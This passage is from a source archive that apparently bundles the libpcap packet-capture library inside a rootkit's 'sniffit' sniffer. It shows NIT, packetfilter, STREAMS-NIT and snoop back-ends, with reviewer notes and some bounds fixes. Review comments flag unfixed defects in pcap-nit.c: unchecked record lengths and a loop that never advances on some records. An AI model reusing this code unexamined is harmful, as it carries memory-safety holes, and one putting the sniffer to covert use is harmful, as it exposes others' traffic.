Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" /* * The chunk size for NIT. This is the amount of buffering * done for read calls. */ #define CHUNKSIZE (2*1024) /* * The total buffer space used by NIT. 
 */
#define BUFSPACE (4*CHUNKSIZE)

/* Forwards */
static int nit_setflags(int, int, int, char *);

/*
 * Copy the statistics accumulated in the handle into *ps.
 * Always returns 0.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{

	*ps = p->md.stat;
	return (0);
}

/*
 * Deliver buffered NIT records to `callback'.
 *
 * When no bytes are left over from a previous call (p->cc == 0) one
 * read() refills p->buffer; otherwise parsing resumes at p->bp.  Each
 * record that passes the filter is handed to `callback' with `user'.
 * Returns the number of packets delivered, 0 when the read would block,
 * or -1 with a message in p->errbuf.  Once `cnt' packets have been
 * delivered (cnt >= 0) the unread remainder is saved in p->cc / p->bp.
 */
int
pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	register int cc, n;
	register struct bpf_insn *fcode = p->fcode.bf_insns;
	register u_char *bp, *cp, *ep;
	register struct nit_hdr *nh;
	register int caplen;

	cc = p->cc;
	if (cc == 0) {
		cc = read(p->fd, (char *)p->buffer, p->bufsize);
		if (cc < 0) {
			if (errno == EWOULDBLOCK)
				return (0);
			sprintf(p->errbuf, "pcap_read: %s",
			    pcap_strerror(errno));
			return (-1);
		}
		bp = p->buffer;
	} else
		bp = p->bp;

	/*
	 * Loop through each packet.  The increment expression
	 * rounds up to the next int boundary past the end of
	 * the previous packet.
	 *
	 * NOTE(review): this is a while loop with no increment expression;
	 * bp only advances on the NIT_CATCH path below.
	 */
	n = 0;
	ep = bp + cc;
	while (bp < ep) {
		/*
		 * NOTE(review): nothing checks that a whole nit_hdr, or the
		 * data length it declares, lies before ep.
		 */
		nh = (struct nit_hdr *)bp;
		cp = bp + sizeof(*nh);

		switch (nh->nh_state) {

		case NIT_CATCH:
			break;

		case NIT_NOMBUF:
		case NIT_NOCLUSTER:
		case NIT_NOSPACE:
			p->md.stat.ps_drop = nh->nh_dropped;
			/*
			 * NOTE(review): re-enters the loop with bp unchanged,
			 * so the same header is examined again.  Confirm the
			 * stride of non-NIT_CATCH records before fixing.
			 */
			continue;

		case NIT_SEQNO:
			/* NOTE(review): same as above -- bp is not advanced. */
			continue;

		default:
			sprintf(p->errbuf, "bad nit state %d", nh->nh_state);
			return (-1);
		}
		++p->md.stat.ps_recv;
		/* Step to the next record, rounded up to an int boundary. */
		bp += ((sizeof(struct nit_hdr) + nh->nh_datalen +
		    sizeof(int) - 1) & ~(sizeof(int) - 1));

		/*
		 * NOTE(review): caplen is derived from the wire length and
		 * the snapshot only; nh_datalen is not consulted -- confirm
		 * it cannot exceed the bytes actually present at cp.
		 */
		caplen = nh->nh_wirelen;
		if (caplen > p->snapshot)
			caplen = p->snapshot;
		if (bpf_filter(fcode, cp, nh->nh_wirelen, caplen)) {
			struct pcap_pkthdr h;
			h.ts = nh->nh_timestamp;
			h.len = nh->nh_wirelen;
			h.caplen = caplen;
			(*callback)(user, &h, cp);
			if (++n >= cnt && cnt >= 0) {
				/* Remember where to resume on the next call. */
				p->cc = ep - bp;
				p->bp = bp;
				return (n);
			}
		}
	}
	p->cc = 0;
	return (n);
}

/*
 * Fill in a nit_ioc request for the socket `fd': buffer and chunk sizes,
 * all packet types, int alignment, plus the optional read timeout
 * (`to_ms', milliseconds) and promiscuous flag.
 *
 * NOTE(review): `p' is neither a parameter nor a local of this function,
 * so the nioc_snaplen assignment only compiles if a file-scope `p' exists
 * elsewhere -- none is visible here.
 */
static int
nit_setflags(int fd, int promisc, int to_ms, char *ebuf)
{
	struct nit_ioc nioc;

	bzero((char *)&nioc, sizeof(nioc));
	nioc.nioc_bufspace = BUFSPACE;
	nioc.nioc_chunksize = CHUNKSIZE;
	nioc.nioc_typetomatch = NT_ALLTYPES;
	nioc.nioc_snaplen = p->snapshot;
	nioc.nioc_bufalign = sizeof(int);
	nioc.nioc_bufoffset = 0;

	if (to_ms != 0) {
		nioc.nioc_flags |= NF_TIMEOUT;
		nioc.nioc_timeout.tv_sec = to_ms / 1000;
nioc.nioc_timeout.tv_usec = (to_ms * 1000) % 1000000; } if (promisc) nioc.nioc_flags |= NF_PROMISC; if (ioctl(fd, SIOCSNIT, &nioc) < 0) { sprintf(ebuf, "SIOCSNIT: %s", pcap_strerror(errno)); return (-1); } return (0); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { int fd; struct sockaddr_nit snit; register pcap_t *p; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, pcap_strerror(errno)); return (NULL); } if (snaplen < 96) /* * NIT requires a snapshot length of at least 96. */ snaplen = 96; bzero(p, sizeof(*p)); p->fd = fd = socket(AF_NIT, SOCK_RAW, NITPROTO_RAW); if (fd < 0) { sprintf(ebuf, "socket: %s", pcap_strerror(errno)); goto bad; } snit.snit_family = AF_NIT; (void)strncpy(snit.snit_ifname, device, NITIFSIZ); if (bind(fd, (struct sockaddr *)&snit, sizeof(snit))) { sprintf(ebuf, "bind: %s: %s", snit.snit_ifname, pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; nit_setflags(p->fd, promisc, to_ms, ebuf); /* * NIT supports only ethernets. */ p->linktype = DLT_EN10MB; p->bufsize = BUFSPACE; p->buffer = (u_char *)malloc(p->bufsize); if (p->buffer == NULL) { strcpy(ebuf, pcap_strerror(errno)); goto bad; } return (p); bad: if (fd >= 0) close(fd); free(p); return (NULL); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-nit.h100400 764 764 1656 6226213211 16534 0ustar dfdf/* * Copyright (c) 1990, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Lawrence Berkeley Laboratory, * Berkeley, CA. 
The name of the University may not be used to * endorse or promote products derived from this software without * specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: pcap-nit.h,v 1.2 94/06/14 20:06:03 leres Exp $ (LBL) */ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-pf.c100400 764 764 17673 6226213211 16370 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-pf.c,v 1.32 94/06/10 17:41:01 mccanne Exp $ (LBL)"; #endif /* * packet filter subroutines for tcpdump * Extraction/creation by Jeffrey Mogul, DECWRL * * Extracted from tcpdump.c. 
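*/
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h"

/*
 * BUFSPACE is the size in bytes of the packet read buffer.  Most tcpdump
 * applications aren't going to need more than 200 bytes of packet header
 * and the read shouldn't return more packets than packetfilter's internal
 * queue limit (bounded at 256).
 */
#define BUFSPACE (200*256)

/*
 * Read one batch of packets from the packet filter descriptor and hand
 * each accepted packet to `callback'.
 *
 * pc		capture handle; pc->cc / pc->bp carry an unfinished batch
 *		over to the next call
 * cnt		stop after this many accepted packets when cnt > 0
 * callback	invoked as (*callback)(user, &hdr, data) per accepted packet
 * user		opaque pointer passed through to the callback
 *
 * Returns the number of packets delivered, 0 when the read would block,
 * or -1 with pc->errbuf set when read() fails.
 */
int
pcap_read(pcap_t *pc, int cnt, pcap_handler callback, u_char *user)
{
	u_char *p;
	struct bpf_insn *fcode;
	int cc;
	register u_char *bp;
	int buflen, inc;
	struct enstamp stamp;
	int n;

	/* A null program means the kernel already filtered for us. */
	fcode = pc->md.use_bpf ? 0 : pc->fcode.bf_insns;
 again:
	cc = pc->cc;
	if (cc == 0) {
		cc = read(pc->fd, (char *)pc->buffer, pc->bufsize);
		if (cc < 0) {
			if (errno == EWOULDBLOCK)
				return (0);
			if (errno == EINVAL &&
			    (long)(tell(pc->fd) + pc->bufsize) < 0) {
				/*
				 * Due to a kernel bug, after 2^31 bytes,
				 * the kernel file offset overflows and
				 * read fails with EINVAL. The lseek()
				 * to 0 will fix things.
				 */
				(void)lseek(pc->fd, 0L, 0);
				goto again;
			}
			sprintf(pc->errbuf, "pf read: %s",
				pcap_strerror(errno));
			return (-1);
		}
		bp = pc->buffer;
	} else
		bp = pc->bp;
	/*
	 * Loop through each packet.
	 */
	n = 0;
	while (cc > 0) {
		/*
		 * Do not copy a stamp out of bytes that were never read:
		 * a remainder shorter than one header cannot be a record.
		 */
		if (cc < (int)sizeof(stamp))
			break;

		/* avoid alignment issues here */
		bcopy((char *)bp, (char *)&stamp, sizeof(stamp));

		if (stamp.ens_stamplen != sizeof(stamp))
			/* buffer is garbage, treat it as poison */
			break;

		p = bp + stamp.ens_stamplen;
		buflen = stamp.ens_count;
		if (buflen > pc->snapshot)
			buflen = pc->snapshot;
		/*
		 * NOTE(review): buflen is derived from the stamp and the
		 * snapshot length only; it is not compared with the bytes
		 * left in this batch (cc).
		 */

		/*
		 * Short-circuit evaluation: if using BPF filter
		 * in kernel, no need to do it now.
		 */
		if (fcode == 0 ||
		    bpf_filter(fcode, p, stamp.ens_count, buflen)) {
			struct pcap_pkthdr h;

			pc->md.TotAccepted++;
			h.ts = stamp.ens_tstamp;
			h.len = stamp.ens_count;
			h.caplen = buflen;
			(*callback)(user, &h, p);
			if (++n >= cnt && cnt > 0) {
				/* Remember where the batch was left off. */
				inc = ENALIGN(buflen + stamp.ens_stamplen);
				cc -= inc;
				bp += inc;
				pc->cc = cc;
				pc->bp = bp;
				return (n);
			}
		}
		pc->md.TotPkts++;
		pc->md.TotDrops += stamp.ens_dropped;
		pc->md.TotMissed = stamp.ens_ifoverflows;
		if (pc->md.OrigMissed < 0)
			pc->md.OrigMissed = pc->md.TotMissed;
		inc = ENALIGN(buflen + stamp.ens_stamplen);
		cc -= inc;
		bp += inc;
	}
	pc->cc = 0;
	return (n);
}

/*
 * Copy the counters kept by pcap_read() into *ps.  ps_ifdrop is reported
 * relative to the first ens_ifoverflows value seen.  Always returns 0.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{

	ps->ps_recv = p->md.TotAccepted;
	ps->ps_drop = p->md.TotDrops;
	ps->ps_ifdrop = p->md.TotMissed - p->md.OrigMissed;
	return (0);
}

/*
 * Open `device' through the packet filter and configure it for capture.
 *
 * snaplen	truncation length handed to EIOCTRUNCATE
 * promisc	non-zero adds ENPROMISC to the mode bits
 * to_ms	read timeout in milliseconds, 0 leaves the timeout unset
 * ebuf		caller's error buffer (PCAP_ERRBUF_SIZE bytes per pcap.h);
 *		written only on failure
 *
 * Returns a handle owned by the caller, or 0 on failure.  On failure the
 * descriptor and the handle are both released.
 */
pcap_t *
pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf)
{
	pcap_t *p;
	short enmode;
	int backlog = -1;	/* request the most */
	struct enfilter Filter;
	struct endevp devparams;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == 0) {
		strcpy(ebuf, "no swap");
		return (0);
	}
	bzero(p, sizeof(*p));
	p->fd = pfopen(device, 0);
	if (p->fd < 0) {
		/*
		 * The device name comes from the caller; cap how much of
		 * it is copied so the message cannot run past ebuf.
		 */
		sprintf(ebuf, "pf open: %.64s: %s\n"
		    "your system may not be properly configured; "
		    "see \"man packetfilter(4)\"\n",
			device, pcap_strerror(errno));
		goto bad;
	}
	p->md.OrigMissed = -1;
	enmode = ENTSTAMP|ENBATCH|ENNONEXCL;
	if (promisc)
		enmode |= ENPROMISC;
	if (ioctl(p->fd, EIOCMBIS, (caddr_t)&enmode) < 0) {
		sprintf(ebuf, "EIOCMBIS: %s", pcap_strerror(errno));
		goto bad;
	}
#ifdef	ENCOPYALL
	/* Try to set COPYALL mode so that we see packets to ourself */
	enmode = ENCOPYALL;
	(void)ioctl(p->fd, EIOCMBIS, (caddr_t)&enmode);/* OK if this fails */
#endif
	/* set the backlog */
	if (ioctl(p->fd, EIOCSETW, (caddr_t)&backlog) < 0) {
		sprintf(ebuf, "EIOCSETW: %s", pcap_strerror(errno));
		goto bad;
	}
	/* set truncation */
	if (ioctl(p->fd, EIOCTRUNCATE, (caddr_t)&snaplen) < 0) {
		sprintf(ebuf, "EIOCTRUNCATE: %s", pcap_strerror(errno));
		goto bad;
	}
	p->snapshot = snaplen;
	/* accept all packets */
	Filter.enf_Priority = 37;	/* anything > 2 */
	Filter.enf_FilterLen = 0;	/* means "always true" */
	if (ioctl(p->fd, EIOCSETF, (caddr_t)&Filter) < 0) {
		sprintf(ebuf, "EIOCSETF: %s", pcap_strerror(errno));
		goto bad;
	}
	/* discover interface type */
	if (ioctl(p->fd, EIOCDEVP, (caddr_t)&devparams) < 0) {
		sprintf(ebuf, "EIOCDEVP: %s", pcap_strerror(errno));
		goto bad;
	}
	/* HACK: to compile prior to Ultrix 4.2 */
#ifndef	ENDT_FDDI
#define	ENDT_FDDI	4
#endif
	switch (devparams.end_dev_type) {

	case ENDT_10MB:
		p->linktype = DLT_EN10MB;
		break;

	case ENDT_FDDI:
		p->linktype = DLT_FDDI;
		break;

	default:
		/*
		 * XXX
		 * Currently, the Ultrix packet filter supports only
		 * Ethernet and FDDI.  Eventually, support for SLIP and PPP
		 * (and possibly others: T1?) should be added.
		 */
#ifdef notdef
		warning(
		    "Packet filter data-link type %d unknown, assuming Ethernet",
		    devparams.end_dev_type);
#endif
		p->linktype = DLT_EN10MB;
		break;
	}

	if (to_ms != 0) {
		struct timeval timeout;

		timeout.tv_sec = to_ms / 1000;
		/* Same value as (to_ms * 1000) % 1000000, minus the overflow. */
		timeout.tv_usec = (to_ms % 1000) * 1000;
		if (ioctl(p->fd, EIOCSRTIMEOUT, (caddr_t)&timeout) < 0) {
			sprintf(ebuf, "EIOCSRTIMEOUT: %s",
				pcap_strerror(errno));
			goto bad;
		}
	}
	p->bufsize = BUFSPACE;
	p->buffer = (u_char*)malloc(p->bufsize);
	if (p->buffer == 0) {
		/* pcap_read() would otherwise read() into a null buffer. */
		strcpy(ebuf, "no swap");
		goto bad;
	}

	return (p);
 bad:
	/* Every jump here happens after pfopen(); do not leak the descriptor. */
	if (p->fd >= 0)
		close(p->fd);
	free(p);
	return (0);
}

/*
 * Install filter program `fp'.  The kernel is tried first (BIOCSETF); when
 * that is not available, or the kernel speaks an older BPF language, the
 * program is kept in the handle so pcap_read() filters in user space.
 *
 * Returns 0 on success, -1 with p->errbuf set when BIOCVERSION fails.
 */
int
pcap_setfilter(pcap_t *p, struct bpf_program *fp)
{
	/*
	 * See if BIOCSETF works.  If it does, the kernel supports
	 * BPF-style filters, and we do not need to do post-filtering.
	 */
	p->md.use_bpf = (ioctl(p->fd, BIOCSETF, (caddr_t)fp) >= 0);
	if (p->md.use_bpf) {
		struct bpf_version bv;

		if (ioctl(p->fd, BIOCVERSION, (caddr_t)&bv) < 0) {
			sprintf(p->errbuf, "BIOCVERSION: %s",
				pcap_strerror(errno));
			return (-1);
		} else if (bv.bv_major != BPF_MAJOR_VERSION ||
			   bv.bv_minor < BPF_MINOR_VERSION) {
			fprintf(stderr,
		"requires bpf language %d.%d or higher; kernel is %d.%d",
				BPF_MAJOR_VERSION, BPF_MINOR_VERSION,
				bv.bv_major, bv.bv_minor);
			/* don't give up, just be inefficient */
			p->md.use_bpf = 0;
			/*
			 * Falling back to user-level filtering needs the
			 * program; without it pcap_read() sees a null
			 * filter and accepts every packet.
			 */
			p->fcode = *fp;
		}
	} else
		p->fcode = *fp;

	/*XXX this goes in tcpdump*/
	if (p->md.use_bpf)
		fprintf(stderr, "tcpdump: Using kernel BPF filter\n");
	else
		fprintf(stderr, "tcpdump: Filtering in user process\n");
	return (0);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-pf.h100400 764 764 1655 6226213211 16346 0ustar dfdf/* * Copyright (c) 1990, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Lawrence Berkeley Laboratory, * Berkeley, CA. The name of the University may not be used to * endorse or promote products derived from this software without * specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: pcap-pf.h,v 1.2 94/06/14 20:06:33 leres Exp $ (LBL) */
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-snit.c100600 764 764 15712 6226213211 16732 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995 * The Regents of the University of California. All rights reserved.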
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-snit.c,v 1.33+ 94/06/23 13:51:17 leres Exp $ (LBL)"; #endif /* * Modifications made to accomodate the new SunOS4.0 NIT facility by * Micky Liu, micky@cunixc.cc.columbia.edu, Columbia University in May, 1989. * This module now handles the STREAMS based NIT. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" /* * The chunk size for NIT. This is the amount of buffering * done for read calls. */ #define CHUNKSIZE (2*1024) /* * The total buffer space used by NIT. 
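*/
#define BUFSPACE (4*CHUNKSIZE)

/* Forwards */
static int nit_setflags(int, int, int, char *);

/*
 * Copy the statistics accumulated by pcap_read() into *ps.
 * Always returns 0.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{

	*ps = p->md.stat;
	return (0);
}

/*
 * Read one chunk from the NIT stream and hand every snapshot that passes
 * the filter in p->fcode to `callback'.
 *
 * p		capture handle; p->cc / p->bp carry an unfinished chunk over
 *		to the next call
 * cnt		stop once this many packets were delivered when cnt >= 0
 * callback	invoked as (*callback)(user, &hdr, data) per accepted packet
 * user		opaque pointer passed through to the callback
 *
 * Returns the number of packets delivered, 0 when the read would block,
 * or -1 with p->errbuf set when read() fails.
 */
int
pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	register int cc, n;
	register struct bpf_insn *fcode = p->fcode.bf_insns;
	register u_char *bp, *cp, *ep;
	register struct nit_bufhdr *hdrp;
	register struct nit_iftime *ntp;
	register struct nit_iflen *nlp;
	register struct nit_ifdrops *ndp;
	register int caplen;

	cc = p->cc;
	if (cc == 0) {
		cc = read(p->fd, (char *)p->buffer, p->bufsize);
		if (cc < 0) {
			if (errno == EWOULDBLOCK)
				return (0);
			sprintf(p->errbuf, "pcap_read: %s",
				pcap_strerror(errno));
			return (-1);
		}
		bp = p->buffer;
	} else
		bp = p->bp;

	/*
	 * loop through each snapshot in the chunk
	 */
	n = 0;
	ep = bp + cc;
	while (bp < ep) {
		/*
		 * The four headers below are read in place; stop when the
		 * rest of the chunk is too short to hold them.
		 */
		if (ep - bp < (int)(sizeof(*hdrp) + sizeof(*ntp) +
		    sizeof(*ndp) + sizeof(*nlp)))
			break;

		++p->md.stat.ps_recv;
		cp = bp;

		/* get past NIT buffer  */
		hdrp = (struct nit_bufhdr *)cp;
		cp += sizeof(*hdrp);

		/* get past NIT timer   */
		ntp = (struct nit_iftime *)cp;
		cp += sizeof(*ntp);

		ndp = (struct nit_ifdrops *)cp;
		p->md.stat.ps_drop = ndp->nh_drops;
		cp += sizeof *ndp;

		/* get past packet len  */
		nlp = (struct nit_iflen *)cp;
		cp += sizeof(*nlp);

		/*
		 * A zero total length would leave bp where it is and the
		 * loop would never finish; treat the chunk as exhausted.
		 */
		if (hdrp->nhb_totlen == 0)
			break;

		/* next snapshot        */
		bp += hdrp->nhb_totlen;

		caplen = nlp->nh_pktlen;
		if (caplen > p->snapshot)
			caplen = p->snapshot;

		if (bpf_filter(fcode, cp, nlp->nh_pktlen, caplen)) {
			struct pcap_pkthdr h;

			h.ts = ntp->nh_timestamp;
			h.len = nlp->nh_pktlen;
			h.caplen = caplen;
			(*callback)(user, &h, cp);
			if (++n >= cnt && cnt >= 0) {
				/* Remember where the chunk was left off. */
				p->cc = ep - bp;
				p->bp = bp;
				return (n);
			}
		}
	}
	p->cc = 0;
	return (n);
}

/*
 * Set the NIT read timeout (when to_ms != 0) and the capture flags on
 * stream `fd'.  NI_PROMISC is added when `promisc' is non-zero.
 *
 * Returns 0 on success, -1 with an error message in ebuf.
 */
static int
nit_setflags(int fd, int promisc, int to_ms, char *ebuf)
{
	u_long flags;
	struct strioctl si;
	struct timeval timeout;

	si.ic_timout = INFTIM;
	if (to_ms != 0) {
		timeout.tv_sec = to_ms / 1000;
		/* Same value as (to_ms * 1000) % 1000000, minus the overflow. */
		timeout.tv_usec = (to_ms % 1000) * 1000;
		si.ic_cmd = NIOCSTIME;
		si.ic_len = sizeof(timeout);
		si.ic_dp = (char *)&timeout;
		if (ioctl(fd, I_STR, (char *)&si) < 0) {
			sprintf(ebuf, "NIOCSTIME: %s", pcap_strerror(errno));
			return (-1);
		}
	}
	flags = NI_TIMESTAMP | NI_LEN | NI_DROPS;
	if (promisc)
		flags |= NI_PROMISC;
	si.ic_cmd = NIOCSFLAGS;
	si.ic_len = sizeof(flags);
	si.ic_dp = (char *)&flags;
	if (ioctl(fd, I_STR, (char *)&si) < 0) {
		sprintf(ebuf, "NIOCSFLAGS: %s", pcap_strerror(errno));
		return (-1);
	}
	return (0);
}

/*
 * Open /dev/nit, push the "nbuf" module, bind the stream to `device' and
 * configure chunk size, snapshot length and flags.
 *
 * snaplen	requested snapshot length; raised to 96 when smaller
 * promisc	non-zero requests promiscuous mode
 * to_ms	read timeout in milliseconds, 0 leaves the timeout unset
 * ebuf		caller's error buffer, written only on failure
 *
 * Returns a handle owned by the caller, or NULL on failure (descriptor
 * closed, handle freed).
 */
pcap_t *
pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf)
{
	struct strioctl si;		/* struct for ioctl() */
	struct ifreq ifr;		/* interface request struct */
	int chunksize = CHUNKSIZE;
	int fd;
	static char dev[] = "/dev/nit";
	register pcap_t *p;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		strcpy(ebuf, pcap_strerror(errno));
		return (NULL);
	}

	if (snaplen < 96)
		/*
		 * NIT requires a snapshot length of at least 96.
		 */
		snaplen = 96;

	bzero(p, sizeof(*p));
	p->fd = fd = open(dev, O_RDONLY);
	if (fd < 0) {
		sprintf(ebuf, "%s: %s", dev, pcap_strerror(errno));
		goto bad;
	}

	/* arrange to get discrete messages from the STREAM and use NIT_BUF */
	if (ioctl(fd, I_SRDOPT, (char *)RMSGD) < 0) {
		sprintf(ebuf, "I_SRDOPT: %s", pcap_strerror(errno));
		goto bad;
	}
	if (ioctl(fd, I_PUSH, "nbuf") < 0) {
		sprintf(ebuf, "push nbuf: %s", pcap_strerror(errno));
		goto bad;
	}
	/* set the chunksize */
	si.ic_cmd = NIOCSCHUNK;
	si.ic_timout = INFTIM;
	si.ic_len = sizeof(chunksize);
	si.ic_dp = (char *)&chunksize;
	if (ioctl(fd, I_STR, (char *)&si) < 0) {
		sprintf(ebuf, "NIOCSCHUNK: %s", pcap_strerror(errno));
		goto bad;
	}

	/* request the interface */
	strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
	/*
	 * strncpy() leaves the name unterminated when `device' fills the
	 * field; the last byte must be a NUL (it was set to a space), or
	 * the "%s" in the NIOCBIND message reads past the array.
	 */
	ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
	si.ic_cmd = NIOCBIND;
	si.ic_len = sizeof(ifr);
	si.ic_dp = (char *)&ifr;
	if (ioctl(fd, I_STR, (char *)&si) < 0) {
		sprintf(ebuf, "NIOCBIND: %s: %s",
			ifr.ifr_name, pcap_strerror(errno));
		goto bad;
	}

	/* set the snapshot length */
	si.ic_cmd = NIOCSSNAP;
	si.ic_len = sizeof(snaplen);
	si.ic_dp = (char *)&snaplen;
	if (ioctl(fd, I_STR, (char *)&si) < 0) {
		sprintf(ebuf, "NIOCSSNAP: %s", pcap_strerror(errno));
		goto bad;
	}
	p->snapshot = snaplen;
	if (nit_setflags(p->fd, promisc, to_ms, ebuf) < 0)
		goto bad;

	(void)ioctl(fd, I_FLUSH, (char *)FLUSHR);
	/*
	 * NIT supports only ethernets.
	 */
	p->linktype = DLT_EN10MB;

	p->bufsize = BUFSPACE;
	p->buffer = (u_char *)malloc(p->bufsize);
	if (p->buffer == NULL) {
		strcpy(ebuf, pcap_strerror(errno));
		goto bad;
	}
	return (p);
 bad:
	if (fd >= 0)
		close(fd);
	free(p);
	return (NULL);
}

/*
 * Keep a copy of the filter program in the handle; pcap_read() applies it
 * in user space.  Always returns 0.
 */
int
pcap_setfilter(pcap_t *p, struct bpf_program *fp)
{

	p->fcode = *fp;
	return (0);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-snoop.c100400 764 764 12060 6226213211 17102 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.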
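*/
#ifndef lint
static char rcsid[] = "@(#)$Header: pcap-snoop.c,v 1.6 94/01/31 05:26:09 leres Exp $ (LBL)";
#endif

#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h"

/* Padding between the snoop header and the link header; set at open time. */
static int hdrpad;	/* XXX */

/*
 * Read a single snoop record and deliver it to `callback' when it passes
 * the filter stored in the handle (no filter means accept).
 *
 * Returns 1 when a packet was delivered, 0 when the read would block or
 * the packet was filtered out, -1 with p->errbuf set on error.
 * `cnt' is not used by this implementation.
 */
int
pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user)
{
	int cc;
	int hdrlen;
	register struct snoopheader *sh;
	register int datalen;
	register int caplen;
	register u_char *cp;

	cc = read(p->fd, (char *)p->buffer, p->bufsize);
	if (cc < 0) {
		switch (errno) {

		case EWOULDBLOCK:
			return (0);			/* XXX */
		}
		sprintf(p->errbuf, "read: %s", pcap_strerror(errno));
		return (-1);
	}

	/*
	 * The header is parsed in place; refuse a record that is shorter
	 * than the header plus padding instead of reading stale bytes.
	 */
	hdrlen = (int)sizeof(*sh) + hdrpad;
	if (cc < hdrlen) {
		sprintf(p->errbuf, "read: truncated snoop record");
		return (-1);
	}

	sh = (struct snoopheader *)p->buffer;
	datalen = sh->snoop_packetlen;
	caplen = (datalen < p->snapshot) ? datalen : p->snapshot;
	/*
	 * Never advertise more captured bytes than were actually read;
	 * the filter and the callback both trust caplen.
	 */
	if (caplen > cc - hdrlen)
		caplen = cc - hdrlen;
	cp = (u_char *)(sh + 1) + hdrpad;		/* XXX */

	if (p->fcode.bf_insns == NULL ||
	    bpf_filter(p->fcode.bf_insns, cp, datalen, caplen)) {
		struct pcap_pkthdr h;

		++p->md.stat.ps_recv;
		h.ts = sh->snoop_timestamp;
		h.len = datalen;
		h.caplen = caplen;
		(*callback)(user, &h, cp);
		return (1);
	}
	return (0);
}

/*
 * Fetch the raw-socket statistics with SIOCRAWSTATS, fold the four drop
 * counters into ps_drop and copy the handle's statistics into *ps.
 *
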